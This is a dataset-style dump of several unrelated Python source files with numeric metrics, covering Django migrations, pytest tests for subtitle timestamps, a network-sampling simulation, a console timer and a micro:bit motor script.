| 36.365152 | 293 | 0.484896 | 2,107 | 24,001 | 5.269103 | 0.076887 | 0.074311 | 0.04864 | 0.049 | 0.831652 | 0.809314 | 0.767429 | 0.750585 | 0.736624 | 0.733111 | 0 | 0.021171 | 0.445023 | 24,001 | 659 | 294 | 36.420334 | 0.812312 | 0.244573 | 0 | 0.772894 | 0 | 0.007326 | 0.115549 | 0.074863 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.054945 | 0.007326 | 0.527473 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
6e3aab5a4e5acdc23448e9a918e9557702641fc9 | 120 | py | Python | astropy_helpers/commands/setup_package.py | bsipocz/astropy-helpers | 4999df1cfb6a5022347b0cef9caf8a556517c625 | [
"PSF-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 9 | 2019-12-06T13:12:33.000Z | 2021-10-05T12:47:15.000Z | astropy_helpers/commands/setup_package.py | bsipocz/astropy-helpers | 4999df1cfb6a5022347b0cef9caf8a556517c625 | [
"PSF-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 2 | 2019-11-28T17:20:27.000Z | 2019-12-09T18:44:35.000Z | astropy_helpers/astropy_helpers/commands/setup_package.py | brechmos-stsci/deleteme | 02590bbe715750c908b6d8013b3ec935eeaf4040 | [
"BSD-3-Clause"
] | 3 | 2019-11-28T17:04:22.000Z | 2021-10-19T13:12:34.000Z | from os.path import join
def get_package_data():
return {'astropy_helpers.commands': [join('src', 'compiler.c')]}
| 20 | 68 | 0.7 | 17 | 120 | 4.764706 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 120 | 5 | 69 | 24 | 0.778846 | 0 | 0 | 0 | 0 | 0 | 0.308333 | 0.2 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
285210b9451d3bea7fb62b3971edaf68c42f171f | 970 | py | Python | falcon_idempotency/mixins.py | bhargavrpatel/falcon-idempotency | 6bfebff601edf47bdd7e027c266d6593cea46ee7 | [
"MIT"
] | 1 | 2019-07-07T07:21:12.000Z | 2019-07-07T07:21:12.000Z | falcon_idempotency/mixins.py | bhargavrpatel/falcon-idempotency | 6bfebff601edf47bdd7e027c266d6593cea46ee7 | [
"MIT"
] | 231 | 2019-02-05T00:50:32.000Z | 2022-03-31T11:17:02.000Z | falcon_idempotency/mixins.py | bhargavrpatel/falcon-idempotency | 6bfebff601edf47bdd7e027c266d6593cea46ee7 | [
"MIT"
] | 1 | 2019-02-05T00:48:43.000Z | 2019-02-05T00:48:43.000Z | class IdempotentPostMixin(object):
"""Idmepotent POST Mixin
A Mixin class which can be added to a resource to enable
idempotent POSTs.
Note
----
Usage of this mixin is completely optional. The implementation
simply checks for the existence of the resource instance variable rather
than checking MRO or something that might strictly necessitate the use
of this mixin.
"""
@property
def idempotent_post(self):
return True
class IdempotentDeleteMixin(object):
"""Idmepotent DELETE Mixin
A Mixin class which can be added to a resource to enable
idempotent DELETEs.
Note
----
Usage of this mixin is completely optional. The implementation
simply checks for the existence of the resource instance variable rather
than checking MRO or something that might strictly necessitate the use
of this mixin.
"""
@property
def idempotent_delete(self):
return True
| 24.871795 | 76 | 0.707216 | 124 | 970 | 5.516129 | 0.403226 | 0.035088 | 0.064327 | 0.046784 | 0.792398 | 0.792398 | 0.792398 | 0.792398 | 0.792398 | 0.792398 | 0 | 0 | 0.251546 | 970 | 38 | 77 | 25.526316 | 0.942149 | 0.685567 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
28527752c856370e9e390284c1f6c596fae2122c | 12 | py | Python | _draft/answers/x_6_8.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | null | null | null | _draft/answers/x_6_8.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | 1 | 2021-11-13T08:03:04.000Z | 2021-11-13T08:03:04.000Z | _draft/answers/x_6_8.py | ofl/kuku2 | 7247fb1862d917d23258ebe7a93dca5939433225 | [
"MIT"
] | null | null | null | # x_6_8
#
#
| 3 | 7 | 0.416667 | 3 | 12 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.333333 | 12 | 3 | 8 | 4 | 0.125 | 0.416667 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
95adb48151c3b75d87822b5892bad406aa035d17 | 1,105 | py | Python | command/italiano/timer.py | LunarStone292/cento_bot | 744a189529a5be38d119085193a5ea623555a7ca | [
"MIT"
] | null | null | null | command/italiano/timer.py | LunarStone292/cento_bot | 744a189529a5be38d119085193a5ea623555a7ca | [
"MIT"
] | null | null | null | command/italiano/timer.py | LunarStone292/cento_bot | 744a189529a5be38d119085193a5ea623555a7ca | [
"MIT"
] | null | null | null | import time
import os
import platform
tempo = int(input("\n quanti secondi deve durere il timer?: "))
if(platform.system() == "Windows"):
os.system("cls")
if(platform.system() == "Linux"):
os.system("clear")
print(" _ _ _ _ _ ")
print("| |_(_)_ __ ___ ___ _ __ _ __ __ _ _ __| |_(_) |_ ___ ")
print("| __| | '_ ` _ \ / _ \ '__| | '_ \ / _` | '__| __| | __/ _ \ ")
print("| |_| | | | | | | __/ | | |_) | (_| | | | |_| | || (_) | ")
print(" \__|_|_| |_| |_|\___|_| | .__/ \__,_|_| \__|_|\__\___/ ")
print(" |_| ")
time.sleep(tempo)
if(platform.system() == "Windows"):
os.system("cls")
if(platform.system() == "Linux"):
os.system("clear")
print(" _ _ _")
print("| |_(_)_ __ ___ ___ ___ _ _| |_")
print("| __| | '_ ` _ \ / _ \ / _ \| | | | __|")
print("| |_| | | | | | | __/ | (_) | |_| | |_")
print(" \__|_|_| |_| |_|\___| \___/ \__,_|\__|")
os.system("cd mp3 & Time-Up.mp3")
os.system("python3 language/italiano/console.py") | 33.484848 | 72 | 0.430769 | 72 | 1,105 | 4.763889 | 0.416667 | 0.262391 | 0.306122 | 0.291545 | 0.556851 | 0.542274 | 0.542274 | 0.542274 | 0.542274 | 0.542274 | 0 | 0.004 | 0.321267 | 1,105 | 33 | 73 | 33.484848 | 0.453333 | 0 | 0 | 0.307692 | 0 | 0.230769 | 0.616387 | 0.026071 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.115385 | 0 | 0.115385 | 0.423077 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
95cc0fd6de201f496df8fc404fa760469e8c0c8b | 5,948 | py | Python | RDS/code/misc_code/hom_debug_tests.py | chrisjcameron/chrisjcameron.github.io | 98bae30c1227465aba09ee50083688857b573cd5 | [
"MIT"
] | null | null | null | RDS/code/misc_code/hom_debug_tests.py | chrisjcameron/chrisjcameron.github.io | 98bae30c1227465aba09ee50083688857b573cd5 | [
"MIT"
] | null | null | null | RDS/code/misc_code/hom_debug_tests.py | chrisjcameron/chrisjcameron.github.io | 98bae30c1227465aba09ee50083688857b573cd5 | [
"MIT"
] | null | null | null | import attdist, simrdclass_collisions_recactByNode as rds, recact, reccho, seedchoice, graphgen as gg, graphmod as gm #RDS-dependent modules
import itertools, time, sys, random, math, string, subprocess as sub, networkx as nx, os, numpy as np #general modules
#------------------------------------
# A network composed of two random networks
G0 = nx.barabasi_albert_graph( 2000 , 100)
G1 = nx.barabasi_albert_graph( 2000, 100)
net0 = rds.RDNet(network=G0, attLevels= attLevels)
net1 = rds.RDNet(network=G1, attLevels= attLevels)
# Assign the site variable
attdist.all( net0, attIndex=0, param='0' )
attdist.all( net1, attIndex=0, param='1' )
# Assign the variable correlated with site
attdist.all( net0, attIndex=1, param='0' )
attdist.all( net1, attIndex=1, param='0' )
attdist.randProp( net0, attIndex=1, param=[.75, '1' ])
attdist.randProp( net1, attIndex=1, param=[.25, '1' ])
# Assign the variable uncorrelated with site
attdist.randProp( net0, attIndex=2, param=[.5, '1' ])
attdist.randProp( net1, attIndex=2, param=[.5, '1' ])
net0.absorb(net1)
mySim = rds.RDSim(RDNet=net0, seeds=10, reclimit=net0.network.order(), \
seedcho=seed_choice, seed_choice_params=seed_choice_params, \
rec=recruitment_activity_method, recparams = recruitment_parameters, rec_meth=rec_method)
net0.clear()
net1.clear()
mySim.reID()
#Calculate the percent in-group ties
within = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]=='1' ]
without1 = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]!='1' ]
without2 = [x for x in mySim.network.edges() if x[0].attlist[2]!='1' and x[1].attlist[2]=='1' ]
float(len(within)) / (len(without1)+len(without2)+len(within))
#------------------------------------
# A single BA network
G0 = nx.barabasi_albert_graph( 2000 , 100)
net0 = rds.RDNet(network=G0, attLevels= attLevels)
# Assign the site variable
attdist.all( net0, attIndex=0, param='0' )
# Assign the variable correlated with site
attdist.all( net0, attIndex=1, param='0' )
attdist.randProp( net0, attIndex=1, param=[.75, '1' ])
# Assign the variable uncorrelated with site
attdist.randProp( net0, attIndex=2, param=[.5, '1' ])
mySim = rds.RDSim(RDNet=net0, seeds=10, reclimit=net0.network.order(), \
seedcho=seed_choice, seed_choice_params=seed_choice_params, \
rec=recruitment_activity_method, recparams = recruitment_parameters, rec_meth=rec_method)
net0.clear()
mySim.reID()
#Calculate the percent in-group ties
within = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]=='1' ]
without1 = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]!='1' ]
without2 = [x for x in mySim.network.edges() if x[0].attlist[2]!='1' and x[1].attlist[2]=='1' ]
float(len(within)) / (len(without1)+len(without2)+len(within))
#------------------------------------
# A single WS network
G0 = nx.connected_watts_strogatz_graph( 2000 , 190, p=.15)
net0 = rds.RDNet(network=G0, attLevels= attLevels)
# Assign the site variable
attdist.all( net0, attIndex=0, param='0' )
# Assign the variable correlated with site
attdist.all( net0, attIndex=1, param='0' )
attdist.randProp( net0, attIndex=1, param=[.75, '1' ])
# Assign the variable uncorrelated with site
attdist.randProp( net0, attIndex=2, param=[.5, '1' ])
mySim = rds.RDSim(RDNet=net0, seeds=10, reclimit=net0.network.order(), \
seedcho=seed_choice, seed_choice_params=seed_choice_params, \
rec=recruitment_activity_method, recparams = recruitment_parameters, rec_meth=rec_method)
net0.clear()
mySim.reID()
#Calculate the percent in-group ties
within = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]=='1' ]
without1 = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]!='1' ]
without2 = [x for x in mySim.network.edges() if x[0].attlist[2]!='1' and x[1].attlist[2]=='1' ]
float(len(within)) / (len(without1)+len(without2)+len(within))
#------------------------------------
# A single ER (random) network
G0 = nx.erdos_renyi_graph( 2000, .098)
net0 = rds.RDNet(network=G0, attLevels= attLevels)
# Assign the site variable
attdist.all( net0, attIndex=0, param='0' )
# Assign the variable correlated with site
attdist.all( net0, attIndex=1, param='0' )
attdist.randProp( net0, attIndex=1, param=[.75, '1' ])
# Assign the variable uncorrelated with site
attdist.randProp( net0, attIndex=2, param=[.5, '1' ])
mySim = rds.RDSim(RDNet=net0, seeds=10, reclimit=net0.network.order(), \
seedcho=seed_choice, seed_choice_params=seed_choice_params, \
rec=recruitment_activity_method, recparams = recruitment_parameters, rec_meth=rec_method)
net0.clear()
mySim.reID()
#Calculate the percent in-group ties
within = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]=='1' ]
without1 = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]!='1' ]
without2 = [x for x in mySim.network.edges() if x[0].attlist[2]!='1' and x[1].attlist[2]=='1' ]
float(len(within)) / (len(without1)+len(without2)+len(within))
#---------
# Other interesting checks:
#Does this capture all the edges
within2 = [x for x in mySim.network.edges() if x[0].attlist[2]=='0' and x[1].attlist[2]=='0' ]
within = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]=='1' ]
without1 = [x for x in mySim.network.edges() if x[0].attlist[2]=='1' and x[1].attlist[2]!='1' ]
without2 = [x for x in mySim.network.edges() if x[0].attlist[2]!='1' and x[1].attlist[2]=='1' ]
within2_len = len(within2)
within1_len = len(within)
without1_2_len = len(without1)
without2_1_len = len(without2)
sum([within2_len, within1_len, without1_2_len, without2_1_len])
mySim.network.size()
# These numbers are equal, so these 4 lists encompass all the ties
| 39.653333 | 140 | 0.67384 | 923 | 5,948 | 4.271939 | 0.141928 | 0.064925 | 0.068476 | 0.028405 | 0.83439 | 0.815369 | 0.808014 | 0.799899 | 0.799899 | 0.799899 | 0 | 0.054969 | 0.140551 | 5,948 | 149 | 141 | 39.919463 | 0.716354 | 0.167787 | 0 | 0.7625 | 0 | 0 | 0.010569 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025 | 0 | 0.025 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2500143ad3a784e6fef2bd8686b236af68f2a668 | 3,724 | py | Python | Core/core/migrations/0002_aventura_lucha_mundoabierto_rol.py | Gelatito/4Fun-Games | c40bc2f0d9007a2fda0ed9ca5ea5f80adf7100cc | [
"MIT"
] | 1 | 2021-09-30T00:44:31.000Z | 2021-09-30T00:44:31.000Z | Core/core/migrations/0002_aventura_lucha_mundoabierto_rol.py | Gelatito/4Fun-Games | c40bc2f0d9007a2fda0ed9ca5ea5f80adf7100cc | [
"MIT"
] | null | null | null | Core/core/migrations/0002_aventura_lucha_mundoabierto_rol.py | Gelatito/4Fun-Games | c40bc2f0d9007a2fda0ed9ca5ea5f80adf7100cc | [
"MIT"
] | null | null | null | # Generated by Django 3.2.4 on 2021-07-14 06:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Rol',
fields=[
('Codigo', models.CharField(max_length=6, primary_key=True, serialize=False, verbose_name='CodigoJuego')),
('NombreDelJuego', models.CharField(max_length=50, verbose_name='NombreDeljuego')),
('CompañiaCreadora', models.CharField(max_length=50, verbose_name='CompañiaCreadora')),
('Plataforma', models.CharField(blank=True, max_length=50, null=True, verbose_name='Plataforma')),
('Descripcion', models.CharField(blank=True, max_length=200, null=True, verbose_name='Descripcion')),
('Caratula', models.ImageField(null=True, upload_to='Caratulas')),
('Categorias', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.categorias')),
],
),
migrations.CreateModel(
name='MundoAbierto',
fields=[
('Codigo', models.CharField(max_length=6, primary_key=True, serialize=False, verbose_name='CodigoJuego')),
('NombreDelJuego', models.CharField(max_length=50, verbose_name='NombreDeljuego')),
('CompañiaCreadora', models.CharField(max_length=50, verbose_name='CompañiaCreadora')),
('Plataforma', models.CharField(blank=True, max_length=50, null=True, verbose_name='Plataforma')),
('Descripcion', models.CharField(blank=True, max_length=200, null=True, verbose_name='Descripcion')),
('Caratula', models.ImageField(null=True, upload_to='Caratulas')),
('Categorias', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.categorias')),
],
),
migrations.CreateModel(
name='Lucha',
fields=[
('Codigo', models.CharField(max_length=6, primary_key=True, serialize=False, verbose_name='CodigoJuego')),
('NombreDelJuego', models.CharField(max_length=50, verbose_name='NombreDeljuego')),
('CompañiaCreadora', models.CharField(max_length=50, verbose_name='CompañiaCreadora')),
('Plataforma', models.CharField(blank=True, max_length=50, null=True, verbose_name='Plataforma')),
('Descripcion', models.CharField(blank=True, max_length=200, null=True, verbose_name='Descripcion')),
('Caratula', models.ImageField(null=True, upload_to='Caratulas')),
('Categorias', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.categorias')),
],
),
migrations.CreateModel(
name='Aventura',
fields=[
('Codigo', models.CharField(max_length=6, primary_key=True, serialize=False, verbose_name='CodigoJuego')),
('NombreDelJuego', models.CharField(max_length=50, verbose_name='NombreDeljuego')),
('CompañiaCreadora', models.CharField(max_length=50, verbose_name='CompañiaCreadora')),
('Plataforma', models.CharField(blank=True, max_length=50, null=True, verbose_name='Plataforma')),
('Descripcion', models.CharField(blank=True, max_length=200, null=True, verbose_name='Descripcion')),
('Caratula', models.ImageField(null=True, upload_to='Caratulas')),
('Categorias', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.categorias')),
],
),
]
| 59.111111 | 122 | 0.630236 | 368 | 3,724 | 6.233696 | 0.163043 | 0.130776 | 0.094159 | 0.125545 | 0.904534 | 0.904534 | 0.904534 | 0.904534 | 0.904534 | 0.904534 | 0 | 0.020458 | 0.225564 | 3,724 | 62 | 123 | 60.064516 | 0.774965 | 0.012084 | 0 | 0.785714 | 1 | 0 | 0.187109 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.089286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
25443727e674b9f820787e495946fa7d8cdda180 | 7,918 | py | Python | tests/srt/test_timestamp.py | sina-e/PyTitle | c23b9d686abb63581dbe2aef937a273d884229eb | [
"MIT"
] | 3 | 2022-03-23T17:14:37.000Z | 2022-03-25T00:02:06.000Z | tests/srt/test_timestamp.py | sina-e/pytitle | c23b9d686abb63581dbe2aef937a273d884229eb | [
"MIT"
] | null | null | null | tests/srt/test_timestamp.py | sina-e/pytitle | c23b9d686abb63581dbe2aef937a273d884229eb | [
"MIT"
] | null | null | null | import pytest
from pytitle.srt import Timestamp, exceptions
from pydantic import ValidationError
def test_timestamp_generation():
Timestamp(hours=0, minutes=0, seconds=0, milliseconds=0).output == "00:00:00,000"
Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456).output == "01:02:03,456"
Timestamp(
hours=1, minutes=25, seconds=39, milliseconds=456
).output == "01:25:39,456"
with pytest.raises(ValidationError):
Timestamp(hours=0, minutes=66, seconds=0, milliseconds=0)
with pytest.raises(ValidationError):
Timestamp(hours=0, minutes=0, seconds=70, milliseconds=0)
with pytest.raises(ValidationError):
Timestamp(hours=0, minutes=0, seconds=0, milliseconds=1000)
with pytest.raises(ValidationError):
Timestamp(hours=0, minutes=-10, seconds=0, milliseconds=0)
def test_timestamp_from_string():
timestamp = Timestamp.from_string("00:00:00,000")
assert timestamp.output == "00:00:00,000"
assert timestamp.hours == 0
assert timestamp.minutes == 0
assert timestamp.seconds == 0
assert timestamp.milliseconds == 0
def test_timestamp_from_string_additional():
timestamp = Timestamp.from_string("01:02:03,456")
assert timestamp.hours == 1
assert timestamp.minutes == 2
assert timestamp.seconds == 3
assert timestamp.milliseconds == 456
def test_timestamp_formatting():
assert Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
) == Timestamp.from_string("01:02:03,456")
assert (
Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456).output
== "01:02:03,456"
)
def test_timestamp_bad_formatting():
assert Timestamp.from_string("1:02:03,456") == Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
)
assert Timestamp.from_string("01:02:03,40") == Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=40
)
assert Timestamp.from_string("1:2:3,456") == Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
)
def test_timestamp_eq_ne_not_timestamp():
assert (Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) == 10) is False
assert (Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) != 10) is True
def test_timestamp_eq():
assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) == Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
)
assert Timestamp(hours=0, minutes=6, seconds=3, milliseconds=678) == Timestamp(
hours=0, minutes=6, seconds=3, milliseconds=678
)
assert Timestamp(hours=0, minutes=0, seconds=0, milliseconds=0) == Timestamp(
hours=0, minutes=0, seconds=0, milliseconds=0
)
assert Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456) == Timestamp(
hours=1, minutes=25, seconds=39, milliseconds=456
)
assert (
Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
== Timestamp(hours=1, minutes=2, seconds=3, milliseconds=890)
) is False
assert (
Timestamp(hours=2, minutes=0, seconds=0, milliseconds=456)
== Timestamp(hours=1, minutes=2, seconds=0, milliseconds=456)
) is False
assert (
Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456)
== Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
) is False
def test_timestamp_ne():
assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) != Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=890
)
assert Timestamp(hours=2, minutes=0, seconds=0, milliseconds=456) != Timestamp(
hours=1, minutes=2, seconds=0, milliseconds=456
)
assert Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456) != Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
)
assert (
Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
!= Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
) is False
assert (
Timestamp(hours=0, minutes=6, seconds=3, milliseconds=678)
!= Timestamp(hours=0, minutes=6, seconds=3, milliseconds=678)
) is False
assert (
Timestamp(hours=0, minutes=0, seconds=0, milliseconds=0)
!= Timestamp(hours=0, minutes=0, seconds=0, milliseconds=0)
) is False
def test_timestamp_gt_ge():
assert (
Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
> Timestamp(hours=1, minutes=2, seconds=3, milliseconds=890)
) is False
assert Timestamp(hours=2, minutes=0, seconds=0, milliseconds=456) > Timestamp(
hours=1, minutes=2, seconds=0, milliseconds=456
)
assert (
Timestamp(hours=1, minutes=25, seconds=3, milliseconds=456)
> Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456)
) is False
assert Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456) > Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
)
assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) >= Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=456
)
assert (
Timestamp(hours=0, minutes=6, seconds=3, milliseconds=678)
>= Timestamp(hours=1, minutes=6, seconds=3, milliseconds=678)
) is False
def test_timestamp_lt_le():
assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) < Timestamp(
hours=1, minutes=2, seconds=3, milliseconds=890
)
assert (
Timestamp(hours=2, minutes=0, seconds=0, milliseconds=456)
< Timestamp(hours=1, minutes=2, seconds=0, milliseconds=456)
) is False
assert Timestamp(hours=1, minutes=25, seconds=3, milliseconds=456) < Timestamp(
hours=1, minutes=25, seconds=39, milliseconds=456
)
assert (
Timestamp(hours=1, minutes=25, seconds=39, milliseconds=456)
< Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
) is False
assert (
Timestamp(hours=2, minutes=2, seconds=3, milliseconds=456)
<= Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
) is False
assert Timestamp(hours=0, minutes=6, seconds=3, milliseconds=678) <= Timestamp(
hours=0, minutes=6, seconds=3, milliseconds=678
)
def test_timestamp_add():
assert Timestamp(minutes=2, seconds=3, milliseconds=456) + Timestamp(
hours=1
) == Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
assert Timestamp(minutes=2, seconds=3, milliseconds=456) + Timestamp(
hours=1,
minutes=2,
) != Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
def test_timestamp_sub():
assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) - Timestamp(
hours=1
) == Timestamp(hours=0, minutes=2, seconds=3, milliseconds=456)
assert Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456) - Timestamp(
hours=1,
minutes=2,
) != Timestamp(hours=0, minutes=2, seconds=3, milliseconds=456)
assert Timestamp(minutes=2, seconds=3, milliseconds=456) - Timestamp(
seconds=55, milliseconds=800
) == Timestamp(minutes=1, seconds=7, milliseconds=656)
def test_timestamp_negative_timestamp_error():
with pytest.raises(exceptions.NegativeTimestampError):
Timestamp(minutes=3, seconds=10) - Timestamp(minutes=5)
def test_timestamp_repr():
assert repr(Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)) == (
"Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)"
)
def test_timestamp_get_value():
timestamp = Timestamp(hours=1, minutes=2, seconds=3, milliseconds=456)
assert timestamp.get_value("hours") == "01"
assert timestamp.get_value("minutes") == "02"
assert timestamp.get_value("seconds") == "03"
assert timestamp.get_value("milliseconds") == "456"
with pytest.raises(ValueError):
timestamp.get_value("foo")
| 37.349057 | 87 | 0.674413 | 1,024 | 7,918 | 5.163086 | 0.067383 | 0.209192 | 0.156043 | 0.21638 | 0.840174 | 0.8101 | 0.797995 | 0.78135 | 0.742198 | 0.733876 | 0 | 0.093383 | 0.192599 | 7,918 | 211 | 88 | 37.526066 | 0.733615 | 0 | 0 | 0.363636 | 0 | 0 | 0.028795 | 0 | 0 | 0 | 0 | 0 | 0.289773 | 1 | 0.085227 | false | 0 | 0.017045 | 0 | 0.102273 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2549e30f34db23ebff6cecb2e3fe3f5c8e7d6937 | 567 | py | Python | bitbot code/backwards_forwards_v001.py | calderdigihub/PiWars21_crashBot | 6ff60cffdca7cb90261fcb2283adc43cf619f37b | [
"MIT"
] | null | null | null | bitbot code/backwards_forwards_v001.py | calderdigihub/PiWars21_crashBot | 6ff60cffdca7cb90261fcb2283adc43cf619f37b | [
"MIT"
] | null | null | null | bitbot code/backwards_forwards_v001.py | calderdigihub/PiWars21_crashBot | 6ff60cffdca7cb90261fcb2283adc43cf619f37b | [
"MIT"
] | 1 | 2021-06-25T10:57:24.000Z | 2021-06-25T10:57:24.000Z |
from microbit import *
from time import sleep
while True:
pin8.write_digital(0)
pin16.write_digital(0)
sleep(1)
pin8.write_digital(0)
pin16.write_digital(1)
sleep(1)
pin8.write_digital(1)
pin16.write_digital(0)
sleep(1)
pin8.write_digital(0)
pin16.write_digital(0)
pin8.write_digital(0)
pin16.write_digital(0)
sleep(1)
pin8.write_digital(0)
pin16.write_digital(1)
sleep(1)
pin8.write_digital(1)
pin16.write_digital(0)
sleep(1)
pin8.write_digital(0)
pin16.write_digital(0) | 19.551724 | 26 | 0.666667 | 85 | 567 | 4.258824 | 0.152941 | 0.530387 | 0.430939 | 0.281768 | 0.872928 | 0.872928 | 0.872928 | 0.872928 | 0.872928 | 0.872928 | 0 | 0.104545 | 0.223986 | 567 | 29 | 27 | 19.551724 | 0.718182 | 0 | 0 | 0.88 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.08 | 0 | 0.08 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
